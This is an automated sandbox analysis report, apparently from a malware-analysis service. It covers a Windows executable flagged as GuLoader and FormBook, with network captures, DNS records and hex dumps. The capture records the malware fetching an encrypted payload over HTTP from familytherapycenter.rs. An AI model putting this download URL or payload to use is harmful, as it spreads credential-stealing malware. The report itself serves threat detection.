                                          Nov 6, 2024 13:50:07.634114981 CET44349825188.40.95.144192.168.2.4
                                          Nov 6, 2024 13:50:07.634177923 CET49825443192.168.2.4188.40.95.144
                                          Nov 6, 2024 13:50:07.634577036 CET44349825188.40.95.144192.168.2.4
                                          Nov 6, 2024 13:50:07.634641886 CET49825443192.168.2.4188.40.95.144
                                          Nov 6, 2024 13:50:07.635185957 CET44349825188.40.95.144192.168.2.4
                                          Nov 6, 2024 13:50:07.635246992 CET49825443192.168.2.4188.40.95.144
                                          Nov 6, 2024 13:50:07.635540009 CET44349825188.40.95.144192.168.2.4
                                          Nov 6, 2024 13:50:07.635596037 CET49825443192.168.2.4188.40.95.144
                                          Nov 6, 2024 13:50:07.671541929 CET44349825188.40.95.144192.168.2.4
                                          Nov 6, 2024 13:50:07.671612024 CET49825443192.168.2.4188.40.95.144
                                          Nov 6, 2024 13:50:07.671724081 CET44349825188.40.95.144192.168.2.4
                                          Nov 6, 2024 13:50:07.671781063 CET49825443192.168.2.4188.40.95.144
                                          Nov 6, 2024 13:50:07.763231039 CET44349825188.40.95.144192.168.2.4
                                          Nov 6, 2024 13:50:07.763360977 CET49825443192.168.2.4188.40.95.144
                                          Nov 6, 2024 13:50:07.763529062 CET44349825188.40.95.144192.168.2.4
                                          Nov 6, 2024 13:50:07.763608932 CET49825443192.168.2.4188.40.95.144
                                          Nov 6, 2024 13:50:07.763897896 CET44349825188.40.95.144192.168.2.4
                                          Nov 6, 2024 13:50:07.763955116 CET49825443192.168.2.4188.40.95.144
                                          Nov 6, 2024 13:50:07.764271021 CET44349825188.40.95.144192.168.2.4
                                          Nov 6, 2024 13:50:07.764348030 CET49825443192.168.2.4188.40.95.144
                                          Nov 6, 2024 13:50:07.764760017 CET44349825188.40.95.144192.168.2.4
                                          Nov 6, 2024 13:50:07.764827013 CET49825443192.168.2.4188.40.95.144
                                          Nov 6, 2024 13:50:07.765156031 CET44349825188.40.95.144192.168.2.4
                                          Nov 6, 2024 13:50:07.765223980 CET49825443192.168.2.4188.40.95.144
                                          Nov 6, 2024 13:50:07.765681028 CET44349825188.40.95.144192.168.2.4
                                          Nov 6, 2024 13:50:07.765749931 CET49825443192.168.2.4188.40.95.144
                                          Nov 6, 2024 13:50:07.766088009 CET44349825188.40.95.144192.168.2.4
                                          Nov 6, 2024 13:50:07.766149998 CET49825443192.168.2.4188.40.95.144
                                          Nov 6, 2024 13:50:07.766441107 CET44349825188.40.95.144192.168.2.4
                                          Nov 6, 2024 13:50:07.766510010 CET44349825188.40.95.144192.168.2.4
                                          Nov 6, 2024 13:50:07.766510010 CET49825443192.168.2.4188.40.95.144
                                          Nov 6, 2024 13:50:07.766582966 CET49825443192.168.2.4188.40.95.144
                                          Nov 6, 2024 13:50:07.777654886 CET49825443192.168.2.4188.40.95.144
                                          Nov 6, 2024 13:50:07.777690887 CET44349825188.40.95.144192.168.2.4
                                          Nov 6, 2024 13:50:07.777729034 CET49825443192.168.2.4188.40.95.144
                                          Nov 6, 2024 13:50:07.777750969 CET49825443192.168.2.4188.40.95.144
                                          TimestampSource PortDest PortSource IPDest IP
                                          Nov 6, 2024 13:50:05.788547039 CET5723853192.168.2.41.1.1.1
                                          Nov 6, 2024 13:50:05.868134022 CET53572381.1.1.1192.168.2.4
                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Nov 6, 2024 13:50:05.788547039 CET192.168.2.41.1.1.10xc936Standard query (0)familytherapycenter.rsA (IP address)IN (0x0001)false
                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Nov 6, 2024 13:50:05.868134022 CET1.1.1.1192.168.2.40xc936No error (0)familytherapycenter.rs188.40.95.144A (IP address)IN (0x0001)false
                                          • familytherapycenter.rs
                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.449825188.40.95.1444436008C:\Users\user\Desktop\5112024976.exe
                                          TimestampBytes transferredDirectionData
                                          2024-11-06 12:50:06 UTC187OUTGET /FWMRlymkKxgrni33.bin HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                          Host: familytherapycenter.rs
                                          Cache-Control: no-cache
                                          2024-11-06 12:50:07 UTC320INHTTP/1.1 200 OK
                                          Date: Wed, 06 Nov 2024 12:50:07 GMT
                                          Server: Apache
                                          Upgrade: h2,h2c
                                          Connection: Upgrade, close
                                          Last-Modified: Tue, 05 Nov 2024 12:17:57 GMT
                                          Accept-Ranges: bytes
                                          Content-Length: 287296
                                          Cache-Control: max-age=172800
                                          Expires: Fri, 08 Nov 2024 12:50:07 GMT
                                          Content-Type: application/octet-stream
                                          2024-11-06 12:50:07 UTC7872INData Raw: a5 c9 5a 94 21 a2 63 a2 a1 00 eb 3f c9 3c 74 b5 8d 5d 9c 56 9b cb 20 c3 33 4c 03 52 40 bc 0f 4e 32 1a f5 47 ba 44 8c a8 1a 99 1b df 2c b0 c7 b3 14 9b 39 34 a5 a1 72 e1 8a ed 51 ce d6 94 65 6d 78 af a9 5c 4c 1f 7e f7 60 5b 4a 55 70 8e bc 67 0d 09 c8 3d a4 4b 4c bb b6 5d 37 76 31 65 29 74 b4 68 ca 68 58 66 2b 8e b7 89 1a bf 89 8c 4d d2 26 47 a4 13 a0 c9 9a 9a 2a 81 37 df 32 78 eb e7 79 11 8e 08 a2 81 91 0b 5c 72 02 24 8a 5a 2e 36 0c 83 46 30 37 40 d6 10 c6 a2 d1 b9 11 f1 f4 f9 bc 31 d1 e7 5f 9e ec be 27 b8 cd cb 86 e7 53 5c 29 80 9b 6d 99 29 07 b0 7a 42 cc 70 60 84 f4 14 8c 72 12 ab 3c 69 9c f2 d8 4e 35 be 74 d7 44 03 5e 00 d6 5c e6 21 ac 8e 02 d1 7f f9 54 88 1d 63 60 0e a5 1d c5 e1 3b 5a 7f 2a f4 2c 43 a0 91 55 b1 4b 36 c5 f6 61 62 35 f0 da eb 07 7a 94 ee
                                          Data Ascii: Z!c?<t]V 3LR@N2GD,94rQemx\L~`[JUpg=KL]7v1e)thhXf+M&G*72xy\r$Z.6F07@1_'S\)m)zBp`r<iN5tD^\!Tc`;Z*,CUK6ab5z
                                          2024-11-06 12:50:07 UTC8000INData Raw: b9 12 d1 8b 00 20 f6 eb 30 6f 24 cc 5f c7 97 8d cd 14 ec e6 fe fd 3a a4 18 c9 c7 94 04 f5 f9 4f 5f 1f 05 ac 3c d3 c4 f1 cb bb b9 27 c1 78 10 cd c2 fb bf 54 4a 10 eb 92 9f 98 c3 6e d0 76 02 07 21 ea 8d 70 fd 33 46 90 f8 64 44 94 c9 d7 c5 a4 88 10 56 ad e3 98 01 92 d6 5f 3a d9 23 d6 28 0e 31 55 be 16 dc e6 90 74 64 14 5e 83 ae a9 bd 8d ad 19 bc 82 d6 59 b8 87 50 fa 47 9e 9c 85 89 07 2b 75 ef c6 96 46 e8 d3 dd c4 ae f3 a9 17 59 0a 6a 9c 0c 27 6f 0c bf c8 86 c1 41 07 51 62 9b 60 f1 1a 20 5b 05 44 fa 2b e1 38 83 c4 19 3a 5b 7a f4 a0 f1 77 86 a6 0a e9 cc 9d ce 76 37 e0 92 0d ca 54 d1 70 69 73 c9 fa cc ca 88 14 2d 3b db 9a bf 6a 97 b0 0e 08 55 d8 a2 17 be 5e 34 d3 ee 4d 9c 96 d0 72 b5 63 b2 5e 64 e5 a8 6b c2 bc e1 7e d9 f0 38 01 20 7c 89 3d 26 86 69 2b 2f b4 b3
                                          Data Ascii: 0o$_:O_<'xTJnv!p3FdDV_:#(1Utd^YPG+uFYj'oAQb` [D+8:[zwv7Tpis-;jU^4Mrc^dk~8 |=&i+/
                                          2024-11-06 12:50:07 UTC8000INData Raw: f1 6a bf 1e 6c 1f d5 81 11 30 35 56 5f bb 06 cc b9 6c 38 ec a8 e3 4e b5 af 4e 49 03 af 25 fa b2 5f 5c 90 72 06 05 0f 6f be a2 65 32 c3 88 13 09 38 a9 c7 ab 00 d6 b9 9f 23 e5 e6 32 ac 8e f1 f1 3d 91 9c 45 f5 b3 ce 6b 34 47 c8 95 de f7 d2 3d 1d b2 f0 40 fb 5c 16 38 c8 c1 c5 7c dc 8a 72 d8 d7 a5 a4 dd ca 06 22 cc 8e 6a c7 70 ca 23 21 3f 18 1c 91 77 be a0 73 c3 95 ee e4 a7 58 98 50 6b 25 6f c7 48 5b 73 08 2c c0 09 00 91 10 c5 a8 f8 a9 63 19 2b c7 13 0e fb ce df d8 28 32 13 ee d5 8f 12 8f 4d e3 7a eb 82 4f cc 10 25 28 97 ea 2b 46 11 41 05 65 5f 6c d9 67 5c e7 63 f4 a5 fa 50 00 82 db a5 af 58 00 19 a5 d1 ad cc c0 ab 06 d9 52 d7 fa 5e 01 04 4a a2 70 ad 24 1c 06 de eb 3f 39 74 cc fd a0 d5 e2 c1 62 24 13 2a 0f d4 04 9f 04 f0 78 48 05 9a bc 9a 49 5e ea 1a 72 00 76
                                          Data Ascii: jl05V_l8NNI%_\roe28#2=Ek4G=@\8|r"jp#!?wsXPk%oH[s,c+(2MzO%(+FAe_lg\cPXR^Jp$?9tb$*xHI^rv
                                          2024-11-06 12:50:07 UTC8000INData Raw: 91 f2 1b be 1c 9e 0a fa c8 5a 53 b0 81 82 5d fa a9 75 84 0f 83 1c 89 40 e2 ad 42 31 1a e4 56 93 30 94 68 40 e5 dd 0f 15 68 00 4d 21 2d 35 22 49 c3 cd 1c c2 1e 9b ac 28 0b 3d df 90 5b f6 dc 7b f6 67 2b e1 44 b6 30 cf f2 af 32 bb 51 75 8b a7 3a 51 7b 3f 01 21 96 5c 51 49 87 60 a8 e3 68 81 49 66 49 02 ac 40 fd ff 87 e6 c8 87 78 97 fe da ef 81 e2 5c 77 4b c7 d2 64 38 6a b2 28 e8 01 78 2b 36 be f1 41 b1 b1 39 45 52 40 a0 0c 19 6b 2f c2 d7 be f1 93 ca 90 75 16 d9 bb e0 28 53 50 19 22 64 58 ab 8b 88 d6 a6 ff c9 90 33 6d 4a d2 a9 c8 62 99 41 cd d0 bb 61 41 e0 c6 43 6e e7 f8 ee 44 4f 3e 7b b2 2d 53 61 22 84 37 7f ec e8 6f 82 e8 e3 28 5c b1 5f de 9c e2 c7 bf 73 74 98 ae df 25 5f 2c 82 9c 19 3c 78 0f 35 96 37 db ea 86 47 0a 4d 96 2b 1f 28 c4 88 87 00 81 ac f7 f2 4d
                                          Data Ascii: ZS]u@B1V0h@hM!-5"I(=[{g+D02Qu:Q{?!\QI`hIfI@x\wKd8j(x+6A9ER@k/u(SP"dX3mJbAaACnDO>{-Sa"7o(\_st%_,<x57GM+(M
                                          2024-11-06 12:50:07 UTC8000INData Raw: f0 87 65 95 7b 75 9f f7 c5 32 94 43 e6 29 56 f6 73 58 5d 60 e3 ad 99 c4 ec 1f ea 52 62 01 24 28 5d 91 01 35 e7 0f 07 26 43 79 2b 3c 98 d6 db 17 d1 f7 79 11 ed 19 49 bc 6f b9 3e a6 63 1c 32 dc ea ec f2 c3 3c 2d 62 17 de d9 97 75 35 86 25 49 26 2f d2 22 b5 8e cf 55 00 63 f4 1f 46 e0 29 56 1b c6 f3 b3 88 54 d6 26 14 46 01 15 d8 2a 4d 82 ad d8 7c 11 b8 e7 06 54 35 15 ee 1a 04 6e 96 9d 5c 57 c2 33 3e 0e 91 de 7d 5b 9b 9b 76 91 ab 2d f6 98 6c b4 81 6f ff 2a ce d8 21 43 b0 84 a1 8d ec 3a 81 a2 7f 9c 5e 5b 47 48 48 95 8f 0a 51 b0 93 02 6b 7b 12 38 ad d3 1e d6 71 2f 99 97 4e cf 28 d0 a7 d6 f8 e6 c9 35 9b c7 85 a3 75 fb 38 e4 87 29 a4 65 29 5c 92 1e bc de dc 06 75 3d 36 62 ba d2 2f 91 8e c7 62 5f 36 47 c2 75 98 f3 4a fd 87 a4 cf e6 1f d5 63 8f 69 8d 3f 20 3f f2 16
                                          Data Ascii: e{u2C)VsX]`Rb$(]5&Cy+<yIo>c2<-bu5%I&/"UcF)VT&F*M|T5n\W3>}[v-lo*!C:^[GHHQk{8q/N(5u8)e)\u=6b/b_6GuJci? ?
                                          2024-11-06 12:50:07 UTC8000INData Raw: 98 5e 32 5a 13 42 41 f3 a9 0f 00 0f f0 6d 95 2c d6 1b 73 ca 4f 41 5a 17 c7 85 9f ff 52 1f fe a4 74 ac 3f 21 55 62 31 80 6e 45 39 1e e4 59 bc 36 af f6 4e 37 30 de da f3 6c ca df b7 6f 14 25 e4 a1 b8 8a 6d 6b cf 5a 45 12 21 ee 14 c3 f9 36 e4 4b 83 c4 03 31 9c 8c 3b 94 4e 9d 5e 54 e8 a6 80 3c 25 33 d2 9d ff 46 90 32 bc d7 fd 42 3c 3d 97 79 2c 26 9d 1d 52 3a 1d b1 a0 e9 ce 94 17 35 1e 8f 6b 47 da 5f 99 ed 3a fc 62 9b cc b6 a8 11 d7 82 ba af 62 d8 30 fb d6 42 42 d6 3c 8b dd 30 f8 66 9f 8a 34 f3 26 cf 3f fc 1d b5 27 e4 35 da 77 a6 60 88 55 ab 04 85 90 b9 c7 7d 2f c2 7d 57 a2 af c8 70 94 99 8a 91 1c 6b 3f 99 fc 5e 37 1f d8 cc 23 9c 67 1b 49 fb 5c bc 42 08 43 ce 32 b1 29 46 11 c4 05 66 8a 35 6a f8 5d ee 81 07 d3 1a 82 f7 b2 f2 83 72 bc da 58 df 4b 18 82 12 cf 19
                                          Data Ascii: ^2ZBAm,sOAZRt?!Ub1nE9Y6N70lo%mkZE!6K1;N^T<%3F2B<=y,&R:5kG_:bb0BB<0f4&?'5w`U}/}Wpk?^7#gI\BC2)Ff5j]rXK
                                          2024-11-06 12:50:07 UTC8000INData Raw: 93 1e a3 0b fe 8d da c1 c5 6b 51 93 c4 e9 eb eb 55 36 bd 6a e6 24 fa f9 6a 32 e6 68 b7 aa fc 25 c3 b5 83 1f 1d 94 69 da ba ce 8b ce 30 1c f1 c8 5c b4 43 b6 2e b2 da ae 71 ff 8e 76 6f 8e 12 0e 2d 7b e7 d1 81 71 0a ea c4 9f ee b2 cd b8 85 c9 92 80 b5 a0 a1 79 fe 96 94 6b 8a 00 e6 49 5c be f1 8c 54 f6 05 9c cf 7e 1c bf 86 62 47 28 9e fa 6f a8 c6 06 20 15 83 26 e0 43 cf ca dc f1 6d a5 df 59 16 b0 fe 13 cb 24 95 3e 34 97 67 41 b4 c9 d2 01 3f 3e 99 c7 70 76 d9 2f 8a 59 ed fa f7 d2 c3 15 4d 25 bc e2 9b ba 97 86 2f 0f 98 3a 15 11 4c 42 49 61 22 fe e4 11 55 31 0b e4 81 9b 6e ab e5 54 e9 d8 7f 16 f1 7c ad 33 a7 8b 19 78 34 2a 44 68 a3 7c e1 0a a7 09 33 02 a3 b0 5d 46 49 f7 76 75 48 27 6e 0d 4d 9e 85 12 3b 6f 87 1c 03 9a ab 0d ea e5 27 b2 c5 e7 f9 f3 2e 00 b7 f9 88
                                          Data Ascii: kQU6j$j2h%i0\C.qvo-{qykI\T~bG(o &CmY$>4gA?>pv/YM%/:LBIa"U1nT|3x4*Dh|3]FIvuH'nM;o'.
                                          2024-11-06 12:50:07 UTC8000INData Raw: cf 01 a9 8a e9 66 d2 ef ad ad 5b 52 b6 70 e5 90 28 48 0d e5 89 88 db f9 ee 6c 94 b0 77 f1 b8 72 b2 01 1b fa 20 a2 68 b3 c9 b6 42 cf bc 59 aa e4 ed c6 b5 c9 93 91 e8 e1 9e 84 fb 4d 34 75 e2 81 08 39 9b b0 1e 16 28 0d 7d 5f 6d 21 13 fe 61 a5 48 04 1d 54 47 78 74 12 a5 8c 3f 12 fa d9 66 35 86 46 c2 6f 3a d6 f1 d9 56 1b 38 65 ec 7f cf 3c 85 f3 94 48 05 7a 3f 6b 15 12 ec 5d c0 5e 37 7f a4 88 f5 16 20 1f ea a8 f1 55 28 14 71 3f 66 a5 30 b5 58 43 4e 6c 0a 84 ec 29 25 a5 d1 6a d1 06 5a 64 ac 3e 17 fb 8e af 8c b1 5a 1e ab 8b 08 26 82 ea e8 6c df c5 db 38 c3 8e d3 d8 fe 11 f9 c8 f7 14 e1 bf dc ec 76 58 17 ba 80 b5 4e 22 18 51 57 70 08 84 88 be 83 24 2d e2 01 d2 59 fe 8c cd 9c ef 2a 6f 72 d9 d0 e5 96 60 5f 63 22 59 37 7f f4 65 04 40 57 fc fa 67 66 82 ab cf 30 9f 8f
                                          Data Ascii: f[Rp(Hlwr hBYM4u9(}_m!aHTGxt?f5Fo:V8e<Hz?k]^7 U(q?f0XCNl)%jZd>Z&l8vXN"QWp$-Y*or`_c"Y7e@Wgf0
                                          2024-11-06 12:50:07 UTC8000INData Raw: 1c a9 7c 5d 9d c9 2e 0b 10 d2 47 c4 bd c1 a9 f7 a5 e0 73 b9 46 8a 8b 05 1b c7 73 f9 4a 05 86 ed b9 03 e3 36 69 c8 0b 50 7b 3a 75 84 94 78 42 98 47 ea db f7 b5 03 0f 3c 50 cc 4d 29 9a d9 2c 48 b3 c2 09 21 9d 98 07 4a d8 67 47 ed 0f c5 56 90 01 d8 8b 7d cf 24 de 60 c7 86 98 da 86 01 ca 82 49 0e 2d c9 80 ec ef a0 df 78 6f 48 5a d0 03 21 17 04 41 f7 42 34 79 91 b3 08 09 3a be b3 e1 c3 f2 60 56 9d d7 9e 8b b2 a8 ba e9 e3 f6 b3 ba 96 78 44 13 6f bd fc f7 bb f5 f1 39 f5 a7 fc 1b 2d 25 64 9c 56 fe c9 73 ea 41 78 1d f3 84 e2 a8 03 4a e1 d0 65 fe db 44 a0 62 ba de 18 56 d7 63 da 28 04 a3 35 1d 28 20 c2 50 e7 ad 21 53 b3 ec 9f c7 af 63 88 2d 1a 63 cc 4c 42 31 9c 2b 1e 9c d0 be a3 fd 5f 58 a5 00 0c bc 8d 4d 8a e4 5f 4f 26 66 9d d5 4e f5 dd 77 1f a9 be be ee a2 a8 fa
                                          Data Ascii: |].GsFsJ6iP{:uxBG<PM),H!JgGV}$`I-xoHZ!AB4y:`VxDo9-%dVsAxJeDbVc(5( P!Sc-cLB1+_XM_O&fNw
                                          2024-11-06 12:50:07 UTC8000INData Raw: 38 38 d5 02 3f bb 86 49 e5 a8 4a be 64 4c f6 5d 46 a7 80 19 a0 5d 68 8b e1 bf 03 27 e3 41 02 70 c7 9b d1 21 1b 71 b7 c2 c9 ef b1 69 b3 6c 08 0b b4 7f ed 10 a7 0d 77 22 42 4d 87 55 8d 10 52 be 26 05 50 17 d3 12 34 50 08 34 5b 43 15 7c d1 51 67 13 c6 2e 24 46 4d 35 d2 bd 5b 42 5d 38 be 4c ad e1 73 0d 48 ce 6a 60 8d fa d4 76 ed a6 aa 50 ed 66 e1 dc b4 aa 6d d6 a6 01 cb 0d fb f8 fd c5 67 ae a7 20 7a c8 37 af 42 83 9e af 44 2a f1 2e 0f 82 d1 0c e0 ca 69 06 0a bc d0 67 32 75 62 ac 40 9d 91 0b 5d 1e bd c3 56 0f 8d 39 3c ad 94 cd 5b d8 00 bb 6c 8c c3 ac bc c0 d7 18 51 b8 bd 85 d4 db 06 4d 3c 4f 2a 87 22 87 fe f3 4b 68 11 b7 73 d0 76 21 35 a4 c2 a7 38 e7 0e 78 fb a0 b1 a2 e4 c0 91 ef eb ed f9 70 aa f2 a1 aa 1e b0 00 e2 c9 18 5d f9 34 5e 89 13 3f db 7a 63 88 fe ca
                                          Data Ascii: 88?IJdL]F]h'Ap!qilw"BMUR&P4P4[C|Qg.$FM5[B]8LsHj`vPfmg z7BD*.ig2ub@]V9<[lQM<O*"Khsv!58xp]4^?zc


                                          Click to jump to process

                                          Click to jump to process

                                          Click to jump to process

                                          Target ID:0
                                          Start time:07:48:46
                                          Start date:06/11/2024
                                          Path:C:\Users\user\Desktop\5112024976.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\5112024976.exe"
                                          Imagebase:0x400000
                                          File size:1'224'768 bytes
                                          MD5 hash:35826E4E9E0DB5CE7A5E95D34C34E2DA
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2387931879.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:low
                                          Has exited:true

                                          Target ID:4
                                          Start time:07:49:56
                                          Start date:06/11/2024
                                          Path:C:\Users\user\Desktop\5112024976.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\5112024976.exe"
                                          Imagebase:0x400000
                                          File size:1'224'768 bytes
                                          MD5 hash:35826E4E9E0DB5CE7A5E95D34C34E2DA
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2840182888.0000000036020000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:low
                                          Has exited:true

                                          No disassembly